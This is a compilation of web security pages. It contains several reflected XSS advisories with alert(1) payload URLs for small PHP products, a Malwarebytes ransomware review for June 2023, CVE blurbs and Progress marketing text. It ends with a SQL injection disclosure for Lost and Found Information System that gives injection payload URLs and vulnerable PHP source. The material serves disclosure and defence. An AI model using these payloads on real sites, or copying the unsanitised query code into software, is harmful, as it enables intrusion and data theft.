Movierocket version 1.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.codester.com/items/32650/                                      ││  Vendor   : Bwiresoft                                                                  ││  Software : Movierocket 1.0                                                            ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /search_catalogGET parameter 'keywords' is vulnerable to RXSShttps://website/search_catalog?keywords=sz83n<script>alert(1)</script>k8jqbPath: /loginGET parameter 'red' is vulnerable to RXSShttps://website/login?red=bol85"><script>alert(1)</script>fdg21 [-] Done

Movierocket 1.0 Cross Site Scripting

Codemonkey Multi Vendor Digital Product Mart version 1.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.codester.com/items/39478/                                      ││  Vendor   : Bwiresoft                                                                  ││  Software : Codemonkey Multi Vendor Digital Product Mart 1.0                           ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /searchGET parameter 'keyword' is vulnerable to RXSShttps://website/search?keyword=ohv4i<script>alert(1)</script>f6pt8&category=allPath: /loginGET parameter 'red' is vulnerable to RXSShttps://website/login?red=vp6bx"><script>alert(1)</script>ik2tx[-] Done

Codemonkey Multi Vendor Digital Product Mart 1.0 Cross Site Scripting

Scriptio version 1.4 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.codester.com/items/39492/ -  https://mybizcms.com/             ││  Vendor   : Emporium                                                                   ││  Software : Scriptio 1.4 (An online text scripts sharing and selling platform)         ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJobd     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /searchGET parameter 'pg' is vulnerable to RXSShttps://website/search?q=&pg=ohv4i<script>alert(1)</script>f6pt8[-] Done

Scriptio 1.4 Cross Site Scripting

EasyAnswer version 1.0.1 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.codester.com/items/40311/                                      ││  Vendor   : Promofile                                                                  ││  Software : EasyAnswer 1.0.1                                                           ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJobd     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /loginGET parameter 'redirect' is vulnerable to RXSShttps://website/login?redirect=afrsa"><script>alert(1)</script>htxuo[-] Done

EasyAnswer 1.0.1 Cross Site Scripting

P2S CMS version 0.1 suffers from a cross site scripting vulnerability.

**P2S CMS 0.1 Cross Site Scripting**

Posted Jun 9, 2023

Authored by indoushka

P2S CMS version 0.1 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 7bb6a5d8c0fb7077e0992b71833738c252f38ebb48abe398cde8f60022fba24c

Download | Favorite | View

**P2S CMS 0.1 Cross Site Scripting**

    ====================================================================================================================================| # Title     : P2s-cms v0.1 XSS Vulnerability                                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : https://www.primestart.net/                                                                                        || # Dork      : index.php?page=busca&palavra=                                                                                      |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  Use Payload : <script>alert(/indoushka/);</script>[+]  http://127.0.0.1/avamcombr/index.php?page=busca&palavra=%3Cscript%3Ealert(/indoushka/);%3C/script%3E        Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,354)
*   Arbitrary (16,067)
*   BBS (2,859)
*   Bypass (1,694)
*   CGI (1,024)
*   Code Execution (7,157)
*   Conference (678)
*   Cracker (841)
*   CSRF (3,317)
*   DoS (23,189)
*   Encryption (2,363)
*   Exploit (51,175)
*   File Inclusion (4,195)
*   File Upload (955)
*   Firewall (821)
*   Info Disclosure (2,720)
*   Intrusion Detection (884)
*   Java (3,002)
*   JavaScript (841)
*   Kernel (6,577)
*   Local (14,393)
*   Magazine (586)
*   Overflow (12,614)
*   Perl (1,423)
*   PHP (5,124)
*   Proof of Concept (2,302)
*   Protocol (3,567)
*   Python (1,509)
*   Remote (30,515)
*   Root (3,556)
*   Rootkit (506)
*   Ruby (609)
*   Scanner (1,633)
*   Security Tool (7,854)
*   Shell (3,163)
*   Shellcode (1,211)
*   Sniffer (893)
*   Spoof (2,189)
*   SQL Injection (16,234)
*   TCP (2,394)
*   Trojan (687)
*   UDP (884)
*   Virus (664)
*   Vulnerability (31,597)
*   Web (9,571)
*   Whitepaper (3,745)
*   x86 (961)
*   XSS (17,693)
*   Other

**File Archives**

*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,979)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,920)
*   Debian (6,758)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,321)
*   HPUX (879)
*   iOS (344)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (45,866)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (482)
*   RedHat (13,370)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,652)
*   UNIX (9,246)
*   UnixWare (186)
*   Windows (6,557)
*   Other

P2S CMS 0.1 Cross Site Scripting

Categories: Ransomware
Categories: Threat Intelligence
May saw a record number of 556 reported ransomware victims, the unusual emergence of Italy and Russia as major targets, and a significant rise in attacks on the education sector.



(Read more...)




The post Ransomware review: June 2023 appeared first on Malwarebytes Labs.

_This article is based on research by Marcelo Rivero, Malwarebytes' ransomware specialist, who monitors information published by ransomware gangs on their Dark Web sites. In this report, "known attacks" are those where the victim didn't pay a ransom. This provides the best overall picture of ransomware activity, but the true number of attacks is far higher._

In May, Lockbit, usually the reigning king of ransomware, found a fierce competitor in MalasLocker. Last month also witnessed a record number of 556 reported ransomware victims, the unusual emergence of Italy and Russia as major targets, and a significant rise in attacks on the education sector.

Let's jump right in with MalasLocker, who burst onto the scene last month with 171 total victims—beating out LockBit (76) by almost 100 known attacks.

Known ransomware attacks by gang, May 2023

This isn't the first time this year a gang has overhauled LockBit and climbed to the top spot on our monthly charts. In April Cl0p rose to the number one spot by compromising over 100 victims with a zero-day vulnerability in the widely-used managed file transfer software GoAnywhere MFT.

This month, MalasLocker's meteoric rise to the top can be explained along similar lines.

MalasLocker attacked vulnerabilities in Zimbra servers, including CVE-2022-24682, to enable remote code execution (RCE). Zimbra Collaboration, formerly known as the Zimbra Collaboration Suite (ZCS) is a collaborative software suite that includes an email server and a web client.

What sets MalasLocker most apart, however, is its unique 'charitable' twist. Rather than demanding ransoms, it asked victims to donate to its approved charities.

MalasLocker: The Robin Hood of ransomware?

Needless to say, it is highly unusual for a ransomware gang to purport to attack organizations on altruistic grounds. We haven't seen it once since keeping track of gangs in early 2022. 

"Unlike traditional ransomware groups, we're not asking you to send us money. We just dislike corporations and economic inequality," reads the MalasLocker ransom note README.txt.

One might assume that a ransomware gang principally opposed to corporations and economic inequality might disproportionately target larger and more wealthy organizations, but this isn't necessarily the case. The gang's blog suggests it's open to targeting businesses of all sizes, so long as they aren't located in "Latin America, Africa, or other colonized countries."

We are completely unmoved by MalasLocker's supposed altruism. Ransomware gangs (and cybercriminals in general) have a long and storied history of writing long and tedious tracts justifying their criminal activity with grandiose claims.

MalasLocker is no different. We read its manifesto so you don't have to, and the only line you need to pay any attention to is the one that reads "so we will become just another ransomware group."

So far, we have no confirmation that MalasLocker is keeping its word for a decryptor when a victim donates money to a charity.

Known ransomware attacks by country, May 2023

Known ransomware attacks by industry sector, May 2023

**Italy and Russia emerge as targets**

The upswing in ransomware activity in Italy and Russia in May is striking. Both countries were propelled into the top three most targeted nations in May, a list typically dominated by the USA and the UK.

Italy saw more than a six-fold increase from the month before, and Russia went from zero reported attacks to 50 in a single month. For comparison, Italy had only eight reported ransomware incidents in April, while Russia wasn't even listed. Similarly, in March, Russia had no reported incidents, and Italy had just eight.

The surge in attacks on these two countries is entirely due to MalasLocker, which hit more targets in Russia and Italy than anywhere else. We assume that this is not a matter of deliberate targeting but simply a matter of where there were vulnerable targets.

Known MalasLocker attacks by country, May 2023

Traditionally, most ransomware gangs have avoided targeting Russia and the Commonwealth of Independent States (CIS) to prevent attracting the attention of local authorities who otherwise turn a blind eye to them.

Either MalasLocker isn't based in the CIS and therefore doesn't fear the Federal Security Service (FSB), or they are going to have a very short stay in the ransomware charts.

**Increased ransomware attacks on Education**

The increase in ransomware attacks on the education sector in May is particularly concerning. May saw 30 known attacks—the highest we've seen in a single month since we started keeping records in early 2022, and the continuation of a trend that has seen a sustained increase over the past twelve months.

Known ransomware attacks against education, June 2022-May 2023

Between June 2022 and May 2023, Vice Society attacked more education targets than any other gang—a specialization that should alarm schools, colleges, and universities everywhere.

**A new norm?**

Ransomware gangs seem to be adopting a new modus operandi: Exploiting known vulnerabilities for multi-target attacks. This year we have seen Cl0p and MalasLocker attack multiple targets simultaneously with (presumably automated) targeting of specific system weaknesses, expanding the scale and impact of their ransomware operations.

Cl0p, for example, has a history of exploiting platforms like Accellion FTA and GoAnywhere MFT. In April, it shifted its focus to a vulnerability in another popular platform, PaperCut.

In June, as we prepared this report, it emerged that Cl0p was been exploiting yet another vulnerability, this time in the widely used file transfer software MOVEit Transfer. The gang started exploiting the vulnerability on May 27th, during the US Memorial Day holiday.

A security bulletin released on May 31, 2023 by Progress Software states:

> “A SQL injection vulnerability has been found in the MOVEit Transfer web application that could allow an un-authenticated attacker to gain unauthorized access to MOVEit Transfer's database. Depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an attacker may be able to infer information about the structure and contents of the database in addition to executing SQL statements that alter or delete database elements.“

This approach is unusual and should concern us all because it has the potential to make ransomware attacks more scalable.

**New players****BlackSuit**

BlackSuit is a new ransomware that is strikingly similar to Royal, sharing 98% of its code. Last month, BlackSuit targeted both Windows and Linux hosts. 

BalckSuit could be a new variant developed by Royal's authors, a mimicry attempt using similar code, an affiliate of the Royal ransomware gang running its own modifications, or even a breakaway group from the Royal ransomware gang. 

**  
Rancoz**

Rancoz is a new ransomware variant which shares similarities with Vice Society. Its sophistication lies in its ability to modify existing code from leaked source codes to target specific industries, organizations, or geographic regions, increasing its attack efficacy and ability to evade detection.

**  
8BASE**

8Base is a newly discovered ransomware gang which, despite only recently gaining attention, has been in operation since April 2022. In May, it had a total of 67 victims.

Predominantly targeting small and medium-sized businesses (SMBs), 8Base has attacked mainly companies within the Professional/Scientific/Technical sector, comprising 36% of known attacks, followed by Manufacturing at 17%. Geographical analysis of the victims suggests a concentration in America and Europe, with the United States and Brazil being the most targeted countries.

**  
RA Group**

RA Group is a new ransomware primarily focusing its attacks on pharmaceutical, insurance, wealth management, and manufacturing firms located in the United States and South Korea. 

The RA Group employs an encryptor derived from the leaked source code of Babuk ransomware, an operation that ceased in 2021. The encryptor employs intermittent encryption, which alternates between encrypting and not encrypting sections of a file to expedite the encryption process, but leaves some data partially recoverable. 

**How to avoid ransomware**

*   **Block common forms of entry**. Create a plan for patching vulnerabilities in internet-facing systems quickly; disable or harden remote access like RDP and VPNs; use endpoint security software that can detect exploits and malware used to deliver ransomware.
*   **Detect intrusions**. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
*   **Stop malicious encryption**. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
*   **Create offsite, offline backups**. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
*   **Don’t get attacked twice.** Once you've isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Ransomware review: June 2023

MongoDB Ops Manager Diagnostics Archive may not redact sensitive PEM key file password app settings. Archives do not include the PEM files themselves. This issue affects MongoDB Ops Manager v5.0 prior to 5.0.21 and MongoDB Ops Manager v6.0 prior to 6.0.12

CVE-2023-0342: Ops Manager Server Changelog — MongoDB Ops Manager 6.0

A buffer overflow was discovered in Progress DataDirect Connect for ODBC before 08.02.2770 for Oracle. An overly large value for certain options of a connection string may overrun the buffer allocated to process the string value. This allows an attacker to execute code of their choice on an affected host by copying carefully selected data that will be executed as code.

**Applications and Experiences That Set You Apart**

Develop the applications you need, deploy how you want and manage it all safely and securely.

You Need The Right  
Software Infrastructure

Explore products designed to accelerate your path to success.

UI/UX Tools

Kendo UI

JavaScript, HTML5 UI widgets for responsive web and data visualization.

Telerik

.NET tools for .NET Ninjas—UI controls, reporting and developer productivity tools.

Test Studio

Automate UI, load and performance testing for web, desktop and mobile.

ThemeBuilder

Control the look and feel of your UI components to fit any brand or application styles. ThemeBuilder is here to help you style your Telerik and Kendo UI components to perfectly match your design requirements.

Digital  
Experience

Sitefinity

Create and analyze successful online experiences that engage your visitors with only a fraction of the time and resources–on prem or in the Cloud.

NativeChat

Rapidly create and deploy purpose-built, AI-driven chatbots as virtual agents.

MOVEit

MOVEit Transfer ensures control over critical file transfers with encryption, tracking and access controls for secure collaboration and automated transfers while maintaining regulatory compliance.

Corticon

Automate business processes with a business rules engine designed for the most rigorous business and regulatory requirements.

Kendo UI

JavaScript, HTML5 UI widgets for responsive web and data visualization.

Telerik

.NET tools for .NET Ninjas—UI controls, reporting and developer productivity tools.

DataDirect

Leverage pre-built data connectors across Relational, NoSQL, Big Data and SaaS data sources.

Infrastructure Management &  
Operations

Kemp Loadmaster

Providing experience-centric application delivery and security with cloud-native, virtual and hardware load balancers combined with flexible consumption options.

WhatsUp Gold

Find and fix network problems fast by monitoring your entire IT Infrastructure (physical, virtual, cloud, applications and more).

Flowmon

Enabling NetSecOps with comprehensive network and security visibility, analysis, and automated response in a consolidated product set.

DevOps

Chef Desktop

Enable IT teams to automate the deployment, management and ongoing compliance of IT resources.

Chef Compliance

Easily maintain and enforce compliance across the enterprise.

Chef Enterprise Automation Stack

Deliver change quickly, repeatedly and securely with a full suite of enterprise infrastructure, application and DevSecOps automation technologies.

Secure Managed  
File Transfer

MOVEit

MOVEit Transfer ensures control over critical file transfers with encryption, tracking and access controls for secure collaboration and automated transfers while maintaining regulatory compliance.

WS\_FTP

Thousands of IT teams depend on WS\_FTP for the unique business-grade features required to assure reliable and secure transfer of critical data.

Trust Progress for Innovation and Results

Top 10

tech companies rely on Progress

3.5 M+

thriving developer community

The 30

largest companies in the world trust Progress

70%

of the Fortune 500 use Progress products

Enterprises Worldwide Rely on Progress

**New & Trending**

CVE-2023-34364: Develop, Deploy & Manage High-Impact Business Apps | Progress Software

A vulnerability has been found in SourceCodester Lost and Found Information System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file admin\inquiries\view_inquiry.php. The manipulation leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-231151.

**Exploit Title: Lost and Found Information System - multiple vulnerabilities****Date: 2023-06/09****Exploit Author: AnotherN****Vendor Homepage: https://www.sourcecodester.com****Software Link: https://www.sourcecodester.com/download-code?nid=16525&title=Lost+and+Found+Information+System+using+PHP+and+MySQL+DB+Source+Code+Free+Download****Version: 1.0****Tested on: windows10 + phpstudy******1.SQL injection vulnerability in items\\index.php****

**Sample request POC #1**

    http://php-lfis.com/?page=items&cid=1%27%20OR%20(SELECT%202608%20FROM(SELECT%20COUNT(*),CONCAT(0x717a786a71,(SELECT%20(ELT(2608=2608,1))),0x71707a6271,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20%27UMbA%27=%27UMbA
    

**Sqlmap running results #1**

**Related Codes items\\index.php**

    <?php 
    if(isset($_GET['cid'])){
        $category_qry = $conn->query("SELECT * FROM `category_list` where `id` = '{$_GET['cid']}'");
        if($category_qry->num_rows > 0){
            foreach($category_qry->fetch_assoc() as $k => $v){
                $cat[$k] = $v; 
            }
        }
    }
    ?>
    

****2.SQL injection vulnerability in admin\\categories\\manage\_category.php****

**Sample request POC #2**

    http://php-lfis.com/?page=admin/categories/manage_category&id=1%27%20OR%20(SELECT%205622%20FROM(SELECT%20COUNT(*),CONCAT(0x7162627871,(SELECT%20(ELT(5622=5622,1))),0x71766b6b71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20%27LIVq%27=%27LIVq
    

**Sqlmap running results #2**

**Related Codes admin\\categories\\manage\_category.php**

    <?php
    if(isset($_GET['id']) && $_GET['id'] > 0){
        $qry = $conn->query("SELECT * from `category_list` where id = '{$_GET['id']}' ");
        if($qry->num_rows > 0){
            foreach($qry->fetch_assoc() as $k => $v){
                $$k=$v;
            }
        }
    }
    ?>
    

****3.SQL injection vulnerability in admin\\categories\\view\_category.php****

**Sample request POC #3**

    http://php-lfis.com/?page=admin/categories/view_category&id=1%27%20AND%20(SELECT%209094%20FROM%20(SELECT(SLEEP(5)))psGp)%20AND%20%27osaz%27=%27osaz
    

**Sqlmap running results #3**

**Related Codes admin\\categories\\view\_category.php**

    <?php
    if(isset($_GET['id']) && $_GET['id'] > 0){
        $qry = $conn->query("SELECT * from `category_list` where id = '{$_GET['id']}' ");
        if($qry->num_rows > 0){
            foreach($qry->fetch_assoc() as $k => $v){
                $$k=$v;
            }
        }else{
    		echo '<script>alert("Category ID is not valid."); location.replace("./?page=categories")</script>';
    	}
    }else{
    	echo '<script>alert("Category ID is Required."); location.replace("./?page=categories")</script>';
    }
    ?>
    

****4.SQL injection vulnerability in admin\\inquiries\\view\_inquiry.php****

**Sample request POC #4**

    http://php-lfis.com/?page=admin/inquiries/view_inquiry&id=1%27%20AND%20(SELECT%203421%20FROM%20(SELECT(SLEEP(5)))gwaX)%20AND%20%27YVdm%27=%27YVdm
    

**Sqlmap running results #4**

**Related Codes admin\\inquiries\\view\_inquiry.php**

    <?php
    if(isset($_GET['id']) && $_GET['id'] > 0){
        $qry = $conn->query("SELECT * from `inquiry_list` where id = '{$_GET['id']}' ");
        if($qry->num_rows > 0){
            foreach($qry->fetch_assoc() as $k => $v){
                $$k=$v;
            }
    		$conn->query("UPDATE `inquiry_list` set `status` = 1 where `id` = '{$id}'");
        }else{
    		echo '<script>alert("inquiry ID is not valid."); location.replace("./?page=inquiries")</script>';
    	}
    }else{
    	echo '<script>alert("inquiry ID is Required."); location.replace("./?page=inquiries")</script>';
    }
    ?>
    

****5.SQL injection vulnerability in admin\\items\\manage\_item.php****

**Sample request POC #5**

    http://php-lfis.com/?page=admin/items/manage_item&id=1%27%20OR%20(SELECT%206925%20FROM(SELECT%20COUNT(*),CONCAT(0x716b767a71,(SELECT%20(ELT(6925=6925,1))),0x7171626b71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20%27SRGH%27=%27SRGH
    

**Sqlmap running results #5**

**Related Codes admin\\items\\manage\_item.php**

    <?php
    if(isset($_GET['id']) && $_GET['id'] > 0){
        $qry = $conn->query("SELECT * from `item_list` where id = '{$_GET['id']}' ");
        if($qry->num_rows > 0){
            foreach($qry->fetch_assoc() as $k => $v){
                $$k=$v;
            }
        }
    }
    ?>
    

****6.SQL injection vulnerability in admin\\items\\view\_item.php****

**Sample request POC #6**

    http://php-lfis.com/?page=admin/items/view_item&id=1%27%20OR%20(SELECT%204881%20FROM(SELECT%20COUNT(*),CONCAT(0x7171707871,(SELECT%20(ELT(4881=4881,1))),0x7171626271,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20%27voJR%27=%27voJR
    

**Sqlmap running results #6**

**Related Codes admin\\items\\view\_item.php**

    <?php
    if(isset($_GET['id']) && $_GET['id'] > 0){
        $qry = $conn->query("SELECT *, COALESCE((SELECT `name` FROM `category_list` where `category_list`.`id` = `item_list`. `category_id` ) ,'N/A') as `category` from `item_list` where id = '{$_GET['id']}' ");
        if($qry->num_rows > 0){
            foreach($qry->fetch_assoc() as $k => $v){
                $$k=$v;
            }
        }else{
    		echo '<script>alert("item ID is not valid."); location.replace("./?page=items")</script>';
    	}
    }else{
    	echo '<script>alert("item ID is Required."); location.replace("./?page=items")</script>';
    }
    ?>
    

****7.SQL injection vulnerability in admin\\user\\manage\_user.php****

**Sample request POC #7**

    http://php-lfis.com/?page=admin/user/manage_user&id=1%27%20OR%20(SELECT%201752%20FROM(SELECT%20COUNT(*),CONCAT(0x7162787071,(SELECT%20(ELT(1752=1752,1))),0x7162627871,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20%27BxHG%27=%27BxHG
    

**Sqlmap running results #7**

**Related Codes admin\\user\\manage\_user.php**

    <?php 
    if(isset($_GET['id'])){
        $user = $conn->query("SELECT * FROM users where id ='{$_GET['id']}' ");
        foreach($user->fetch_array() as $k =>$v){
            $meta[$k] = $v;
        }
    }
    ?>
    

****8.SQL injection vulnerability in items\\view.php****

**Sample request POC #8**

    http://php-lfis.com/?page=items/view&id=1%27%20OR%20(SELECT%204761%20FROM(SELECT%20COUNT(*),CONCAT(0x71766a7671,(SELECT%20(ELT(4761=4761,1))),0x7178787071,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20%27xIxg%27=%27xIxg
    

**Sqlmap running results #8**

**Related Codes items\\view.php**

    <?php
    if(isset($_GET['id']) && $_GET['id'] > 0){
        $qry = $conn->query("SELECT *, COALESCE((SELECT `name` FROM `category_list` where `category_list`.`id` = `item_list`. `category_id` ) ,'N/A') as `category` from `item_list` where id = '{$_GET['id']}' ");
        if($qry->num_rows > 0){
            foreach($qry->fetch_assoc() as $k => $v){
                $$k=$v;
            }
        }else{
    		echo '<script>alert("item ID is not valid."); location.replace("./?page=items")</script>';
    	}
    }else{
    	echo '<script>alert("item ID is Required."); location.replace("./?page=items")</script>';
    }
    ?>

CVE-2023-3177: cvv/Lost and Found Information System - multiple vulnerabilities.md at main · AnotherN/cvv

A vulnerability, which was classified as critical, was found in SourceCodester Lost and Found Information System 1.0. Affected is an unknown function of the file admin\user\manage_user.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-231150 is the identifier assigned to this vulnerability.

Tag

#sql